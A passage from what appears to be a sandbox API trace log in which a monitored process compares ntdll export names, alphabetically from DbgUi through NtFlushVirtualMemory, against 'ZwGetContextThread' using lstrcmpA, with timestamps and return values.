(lpString1="DbgUiDebugActiveProcess", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="ZwGetContextThread") returned -1 [0131.619] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="ZwGetContextThread") returned -1 [0131.619] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="ZwGetContextThread") returned -1 [0131.619] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="ZwGetContextThread") returned -1 [0131.619] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="ZwGetContextThread") returned -1 [0131.619] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="ZwGetContextThread") returned -1 [0131.619] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="ZwGetContextThread") returned -1 [0131.619] lstrcmpA (lpString1="EtwEventEnabled", lpString2="ZwGetContextThread") returned -1 [0131.619] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="ZwGetContextThread") returned -1 [0131.619] lstrcmpA (lpString1="EtwEventRegister", lpString2="ZwGetContextThread") returned -1 [0131.619] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="ZwGetContextThread") returned -1 [0131.619] lstrcmpA (lpString1="EtwEventUnregister", lpString2="ZwGetContextThread") returned -1 [0131.619] lstrcmpA (lpString1="EtwEventWrite", lpString2="ZwGetContextThread") returned -1 [0131.619] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="ZwGetContextThread") returned -1 [0131.619] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="ZwGetContextThread") returned -1 [0131.619] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="ZwGetContextThread") returned -1 [0131.620] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="ZwGetContextThread") returned -1 [0131.620] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="ZwGetContextThread") returned -1 [0131.620] lstrcmpA (lpString1="EtwEventWriteString", lpString2="ZwGetContextThread") returned -1 [0131.620] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="ZwGetContextThread") returned -1 [0131.620] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="ZwGetContextThread") returned -1 [0131.620] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="ZwGetContextThread") returned -1 [0131.620] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="ZwGetContextThread") returned -1 [0131.620] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="ZwGetContextThread") returned -1 [0131.620] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="ZwGetContextThread") returned -1 [0131.620] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="ZwGetContextThread") returned -1 [0131.620] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="ZwGetContextThread") returned -1 [0131.620] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="ZwGetContextThread") returned -1 [0131.620] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="ZwGetContextThread") returned -1 [0131.620] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="ZwGetContextThread") returned -1 [0131.620] lstrcmpA (lpString1="EtwReplyNotification", lpString2="ZwGetContextThread") returned -1 [0131.621] lstrcmpA (lpString1="EtwSendNotification", lpString2="ZwGetContextThread") returned -1 [0131.621] lstrcmpA (lpString1="EtwSetMark", lpString2="ZwGetContextThread") returned -1 [0131.621] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="ZwGetContextThread") returned -1 [0131.621] lstrcmpA (lpString1="EtwTraceMessage", lpString2="ZwGetContextThread") returned -1 [0131.621] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="ZwGetContextThread") returned -1 [0131.621] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="ZwGetContextThread") returned -1 [0131.621] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="ZwGetContextThread") returned -1 [0131.621] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="ZwGetContextThread") returned -1 [0131.621] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="ZwGetContextThread") returned -1 [0131.621] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="ZwGetContextThread") returned -1 [0131.621] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="ZwGetContextThread") returned -1 [0131.621] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="ZwGetContextThread") returned -1 [0131.621] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="ZwGetContextThread") returned -1 [0131.621] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="ZwGetContextThread") returned -1 [0131.621] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="ZwGetContextThread") returned -1 [0131.622] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="ZwGetContextThread") returned -1 [0131.622] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="ZwGetContextThread") returned -1 [0131.622] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="ZwGetContextThread") returned -1 [0131.622] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="ZwGetContextThread") returned -1 [0131.622] lstrcmpA (lpString1="LdrAccessResource", lpString2="ZwGetContextThread") returned -1 [0131.622] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="ZwGetContextThread") returned -1 [0131.622] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="ZwGetContextThread") returned -1 [0131.622] lstrcmpA (lpString1="LdrAddRefDll", lpString2="ZwGetContextThread") returned -1 [0131.622] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="ZwGetContextThread") returned -1 [0131.623] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="ZwGetContextThread") returned -1 [0131.623] lstrcmpA (lpString1="LdrEnumResources", lpString2="ZwGetContextThread") returned -1 [0131.623] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="ZwGetContextThread") returned -1 [0131.623] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="ZwGetContextThread") returned -1 [0131.623] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="ZwGetContextThread") returned -1 [0131.623] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="ZwGetContextThread") returned -1 [0131.623] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="ZwGetContextThread") returned -1 [0131.623] lstrcmpA (lpString1="LdrFindResource_U", lpString2="ZwGetContextThread") returned -1 [0131.623] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="ZwGetContextThread") returned -1 [0131.623] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="ZwGetContextThread") returned -1 [0131.623] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="ZwGetContextThread") returned -1 [0131.624] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="ZwGetContextThread") returned -1 [0131.624] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="ZwGetContextThread") returned -1 [0131.624] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="ZwGetContextThread") returned -1 [0131.624] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="ZwGetContextThread") returned -1 [0131.624] lstrcmpA (lpString1="LdrGetDllPath", lpString2="ZwGetContextThread") returned -1 [0131.624] lstrcmpA (lpString1="LdrGetFailureData", lpString2="ZwGetContextThread") returned -1 [0131.624] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="ZwGetContextThread") returned -1 [0131.624] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="ZwGetContextThread") returned -1 [0131.624] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="ZwGetContextThread") returned -1 [0131.624] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="ZwGetContextThread") returned -1 [0131.625] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="ZwGetContextThread") returned -1 [0131.625] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="ZwGetContextThread") returned -1 [0131.625] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="ZwGetContextThread") returned -1 [0131.625] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="ZwGetContextThread") returned -1 [0131.625] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="ZwGetContextThread") returned -1 [0131.626] lstrcmpA (lpString1="LdrLoadDll", lpString2="ZwGetContextThread") returned -1 [0131.626] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="ZwGetContextThread") returned -1 [0131.626] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="ZwGetContextThread") returned -1 [0131.626] lstrcmpA (lpString1="LdrProcessInitializationComplete", lpString2="ZwGetContextThread") returned -1 [0131.626] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="ZwGetContextThread") returned -1 [0131.626] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="ZwGetContextThread") returned -1 [0131.626] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="ZwGetContextThread") returned -1 [0131.626] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="ZwGetContextThread") returned -1 [0131.626] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="ZwGetContextThread") returned -1 [0131.626] lstrcmpA (lpString1="LdrQueryModuleServiceTags", lpString2="ZwGetContextThread") returned -1 [0131.627] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="ZwGetContextThread") returned -1 [0131.627] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="ZwGetContextThread") returned -1 [0131.627] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="ZwGetContextThread") returned -1 [0131.627] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="ZwGetContextThread") returned -1 [0131.627] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="ZwGetContextThread") returned -1 [0131.627] lstrcmpA (lpString1="LdrResFindResource", lpString2="ZwGetContextThread") returned -1 [0131.627] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="ZwGetContextThread") returned -1 [0131.627] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="ZwGetContextThread") returned -1 [0131.627] lstrcmpA (lpString1="LdrResRelease", lpString2="ZwGetContextThread") returned -1 [0131.627] lstrcmpA (lpString1="LdrResSearchResource", lpString2="ZwGetContextThread") returned -1 [0131.627] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="ZwGetContextThread") returned -1 [0131.628] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="ZwGetContextThread") returned -1 [0131.628] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="ZwGetContextThread") returned -1 [0131.628] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="ZwGetContextThread") returned -1 [0131.628] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="ZwGetContextThread") returned -1 [0131.628] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="ZwGetContextThread") returned -1 [0131.628] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="ZwGetContextThread") returned -1 [0131.628] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="ZwGetContextThread") returned -1 [0131.628] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="ZwGetContextThread") returned -1 [0131.628] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="ZwGetContextThread") returned -1 [0131.628] lstrcmpA (lpString1="LdrShutdownThread", lpString2="ZwGetContextThread") returned -1 [0131.628] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="ZwGetContextThread") returned -1 [0131.628] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="ZwGetContextThread") returned -1 [0131.628] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="ZwGetContextThread") returned -1 [0131.628] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="ZwGetContextThread") returned -1 [0131.629] lstrcmpA (lpString1="LdrUnloadDll", lpString2="ZwGetContextThread") returned -1 [0131.629] lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="ZwGetContextThread") returned -1 [0134.015] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="ZwGetContextThread") returned -1 [0134.015] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="ZwGetContextThread") returned -1 [0134.015] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="ZwGetContextThread") returned -1 [0134.015] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="ZwGetContextThread") returned -1 [0134.015] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="ZwGetContextThread") returned -1 [0134.015] lstrcmpA (lpString1="MD4Final", lpString2="ZwGetContextThread") returned -1 [0134.015] lstrcmpA (lpString1="MD4Init", lpString2="ZwGetContextThread") returned -1 [0134.015] lstrcmpA (lpString1="MD4Update", lpString2="ZwGetContextThread") returned -1 [0134.015] lstrcmpA (lpString1="MD5Final", lpString2="ZwGetContextThread") returned -1 [0134.015] lstrcmpA (lpString1="MD5Init", lpString2="ZwGetContextThread") returned -1 [0134.016] lstrcmpA (lpString1="MD5Update", lpString2="ZwGetContextThread") returned -1 [0134.016] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="ZwGetContextThread") returned -1 [0134.016] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="ZwGetContextThread") returned -1 [0134.016] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="ZwGetContextThread") returned -1 [0134.016] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="ZwGetContextThread") returned -1 [0134.016] lstrcmpA (lpString1="NtAccessCheck", lpString2="ZwGetContextThread") returned -1 [0134.016] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="ZwGetContextThread") returned -1 [0134.016] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="ZwGetContextThread") returned -1 [0134.016] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="ZwGetContextThread") returned -1 [0134.016] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="ZwGetContextThread") returned -1 [0134.016] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="ZwGetContextThread") returned -1 [0134.016] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="ZwGetContextThread") returned -1 [0134.016] lstrcmpA (lpString1="NtAddAtom", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAddAtomEx", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAddBootEntry", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAlertThread", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAllocateLocallyUniqueId", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAllocateUuids", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="ZwGetContextThread") returned -1 [0134.017] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="ZwGetContextThread") returned -1 [0134.018] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="ZwGetContextThread") returned -1 [0134.019] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="ZwGetContextThread") returned -1 [0134.019] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="ZwGetContextThread") returned -1 [0134.019] lstrcmpA (lpString1="NtCallbackReturn", lpString2="ZwGetContextThread") returned -1 [0134.019] lstrcmpA (lpString1="NtCancelIoFile", lpString2="ZwGetContextThread") returned -1 [0134.019] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="ZwGetContextThread") returned -1 [0134.019] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="ZwGetContextThread") returned -1 [0134.019] lstrcmpA (lpString1="NtCancelTimer", lpString2="ZwGetContextThread") returned -1 [0134.019] lstrcmpA (lpString1="NtCancelTimer2", lpString2="ZwGetContextThread") returned -1 [0134.019] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="ZwGetContextThread") returned -1 [0134.020] lstrcmpA (lpString1="NtClearEvent", lpString2="ZwGetContextThread") returned -1 [0134.020] lstrcmpA (lpString1="NtClose", lpString2="ZwGetContextThread") returned -1 [0134.020] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="ZwGetContextThread") returned -1 [0134.020] lstrcmpA (lpString1="NtCommitComplete", lpString2="ZwGetContextThread") returned -1 [0134.020] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="ZwGetContextThread") returned -1 [0134.020] lstrcmpA (lpString1="NtCommitTransaction", lpString2="ZwGetContextThread") returned -1 [0134.020] lstrcmpA (lpString1="NtCompactKeys", lpString2="ZwGetContextThread") returned -1 [0134.020] lstrcmpA (lpString1="NtCompareObjects", lpString2="ZwGetContextThread") returned -1 [0134.021] lstrcmpA (lpString1="NtCompareTokens", lpString2="ZwGetContextThread") returned -1 [0134.021] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="ZwGetContextThread") returned -1 [0134.021] lstrcmpA (lpString1="NtCompressKey", lpString2="ZwGetContextThread") returned -1 [0134.021] lstrcmpA (lpString1="NtConnectPort", lpString2="ZwGetContextThread") returned -1 [0134.021] lstrcmpA (lpString1="NtContinue", lpString2="ZwGetContextThread") returned -1 [0134.021] lstrcmpA (lpString1="NtCreateDebugObject", lpString2="ZwGetContextThread") returned -1 [0134.021] lstrcmpA (lpString1="NtCreateDirectoryObject", lpString2="ZwGetContextThread") returned -1 [0134.021] lstrcmpA (lpString1="NtCreateDirectoryObjectEx", lpString2="ZwGetContextThread") returned -1 [0134.021] lstrcmpA (lpString1="NtCreateEnclave", lpString2="ZwGetContextThread") returned -1 [0134.021] lstrcmpA (lpString1="NtCreateEnlistment", lpString2="ZwGetContextThread") returned -1 [0134.022] lstrcmpA (lpString1="NtCreateEvent", lpString2="ZwGetContextThread") returned -1 [0134.022] lstrcmpA (lpString1="NtCreateEventPair", lpString2="ZwGetContextThread") returned -1 [0134.022] lstrcmpA (lpString1="NtCreateFile", lpString2="ZwGetContextThread") returned -1 [0134.022] lstrcmpA (lpString1="NtCreateIRTimer", lpString2="ZwGetContextThread") returned -1 [0134.022] lstrcmpA (lpString1="NtCreateIoCompletion", lpString2="ZwGetContextThread") returned -1 [0134.022] lstrcmpA (lpString1="NtCreateJobObject", lpString2="ZwGetContextThread") returned -1 [0134.022] lstrcmpA (lpString1="NtCreateJobSet", lpString2="ZwGetContextThread") returned -1 [0134.022] lstrcmpA (lpString1="NtCreateKey", lpString2="ZwGetContextThread") returned -1 [0134.022] lstrcmpA (lpString1="NtCreateKeyTransacted", lpString2="ZwGetContextThread") returned -1 [0134.022] lstrcmpA (lpString1="NtCreateKeyedEvent", lpString2="ZwGetContextThread") returned -1 [0134.022] lstrcmpA (lpString1="NtCreateLowBoxToken", lpString2="ZwGetContextThread") returned -1 [0134.023] lstrcmpA (lpString1="NtCreateMailslotFile", lpString2="ZwGetContextThread") returned -1 [0134.023] lstrcmpA (lpString1="NtCreateMutant", lpString2="ZwGetContextThread") returned -1 [0134.023] lstrcmpA (lpString1="NtCreateNamedPipeFile", lpString2="ZwGetContextThread") returned -1 [0134.023] lstrcmpA (lpString1="NtCreatePagingFile", lpString2="ZwGetContextThread") returned -1 [0134.023] lstrcmpA (lpString1="NtCreatePartition", lpString2="ZwGetContextThread") returned -1 [0134.023] lstrcmpA (lpString1="NtCreatePort", lpString2="ZwGetContextThread") returned -1 [0134.024] lstrcmpA (lpString1="NtCreatePrivateNamespace", lpString2="ZwGetContextThread") returned -1 [0134.024] lstrcmpA (lpString1="NtCreateProcess", lpString2="ZwGetContextThread") returned -1 [0134.024] lstrcmpA (lpString1="NtCreateProcessEx", lpString2="ZwGetContextThread") returned -1 [0134.024] lstrcmpA (lpString1="NtCreateProfile", lpString2="ZwGetContextThread") returned -1 [0134.024] lstrcmpA (lpString1="NtCreateProfileEx", lpString2="ZwGetContextThread") returned -1 [0134.024] lstrcmpA (lpString1="NtCreateResourceManager", lpString2="ZwGetContextThread") returned -1 [0134.024] lstrcmpA (lpString1="NtCreateSection", lpString2="ZwGetContextThread") returned -1 [0134.024] lstrcmpA (lpString1="NtCreateSemaphore", lpString2="ZwGetContextThread") returned -1 [0134.024] lstrcmpA (lpString1="NtCreateSymbolicLinkObject", lpString2="ZwGetContextThread") returned -1 [0134.024] lstrcmpA (lpString1="NtCreateThread", lpString2="ZwGetContextThread") returned -1 [0134.024] lstrcmpA (lpString1="NtCreateThreadEx", lpString2="ZwGetContextThread") returned -1 [0134.024] lstrcmpA (lpString1="NtCreateTimer", lpString2="ZwGetContextThread") returned -1 [0134.024] lstrcmpA (lpString1="NtCreateTimer2", lpString2="ZwGetContextThread") returned -1 [0134.025] lstrcmpA (lpString1="NtCreateToken", lpString2="ZwGetContextThread") returned -1 [0134.025] lstrcmpA (lpString1="NtCreateTokenEx", lpString2="ZwGetContextThread") returned -1 [0134.025] lstrcmpA (lpString1="NtCreateTransaction", lpString2="ZwGetContextThread") returned -1 [0134.025] lstrcmpA (lpString1="NtCreateTransactionManager", lpString2="ZwGetContextThread") returned -1 [0134.025] lstrcmpA (lpString1="NtCreateUserProcess", lpString2="ZwGetContextThread") returned -1 [0134.025] lstrcmpA (lpString1="NtCreateWaitCompletionPacket", lpString2="ZwGetContextThread") returned -1 [0134.025] lstrcmpA (lpString1="NtCreateWaitablePort", lpString2="ZwGetContextThread") returned -1 [0134.025] lstrcmpA (lpString1="NtCreateWnfStateName", lpString2="ZwGetContextThread") returned -1 [0134.025] lstrcmpA (lpString1="NtCreateWorkerFactory", lpString2="ZwGetContextThread") returned -1 [0134.025] lstrcmpA (lpString1="NtDebugActiveProcess", lpString2="ZwGetContextThread") returned -1 [0134.025] lstrcmpA (lpString1="NtDebugContinue", lpString2="ZwGetContextThread") returned -1 [0134.025] lstrcmpA (lpString1="NtDelayExecution", lpString2="ZwGetContextThread") returned -1 [0134.025] lstrcmpA (lpString1="NtDeleteAtom", lpString2="ZwGetContextThread") returned -1 [0134.026] lstrcmpA (lpString1="NtDeleteBootEntry", lpString2="ZwGetContextThread") returned -1 [0134.026] lstrcmpA (lpString1="NtDeleteDriverEntry", lpString2="ZwGetContextThread") returned -1 [0134.026] lstrcmpA (lpString1="NtDeleteFile", lpString2="ZwGetContextThread") returned -1 [0134.026] lstrcmpA (lpString1="NtDeleteKey", lpString2="ZwGetContextThread") returned -1 [0134.026] lstrcmpA (lpString1="NtDeleteObjectAuditAlarm", lpString2="ZwGetContextThread") returned -1 [0134.026] lstrcmpA (lpString1="NtDeletePrivateNamespace", lpString2="ZwGetContextThread") returned -1 [0134.026] lstrcmpA (lpString1="NtDeleteValueKey", lpString2="ZwGetContextThread") returned -1 [0134.026] lstrcmpA (lpString1="NtDeleteWnfStateData", lpString2="ZwGetContextThread") returned -1 [0134.026] lstrcmpA (lpString1="NtDeleteWnfStateName", lpString2="ZwGetContextThread") returned -1 [0134.026] lstrcmpA (lpString1="NtDeviceIoControlFile", lpString2="ZwGetContextThread") returned -1 [0134.026] lstrcmpA (lpString1="NtDisableLastKnownGood", lpString2="ZwGetContextThread") returned -1 [0134.026] lstrcmpA (lpString1="NtDisplayString", lpString2="ZwGetContextThread") returned -1 [0134.026] lstrcmpA (lpString1="NtDrawText", lpString2="ZwGetContextThread") returned -1 [0134.026] lstrcmpA (lpString1="NtDuplicateObject", lpString2="ZwGetContextThread") returned -1 [0134.026] lstrcmpA (lpString1="NtDuplicateToken", lpString2="ZwGetContextThread") returned -1 [0134.026] lstrcmpA (lpString1="NtEnableLastKnownGood", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtEnumerateBootEntries", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtEnumerateDriverEntries", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtEnumerateKey", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtEnumerateSystemEnvironmentValuesEx", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtEnumerateTransactionObject", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtEnumerateValueKey", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtExtendSection", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtFilterBootOption", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtFilterToken", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtFilterTokenEx", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtFindAtom", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtFlushBuffersFile", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtFlushBuffersFileEx", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtFlushInstallUILanguage", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtFlushInstructionCache", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtFlushKey", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtFlushProcessWriteBuffers", lpString2="ZwGetContextThread") returned -1 [0134.027] lstrcmpA (lpString1="NtFlushVirtualMemory", lpString2="ZwGetContextThread") returned -1 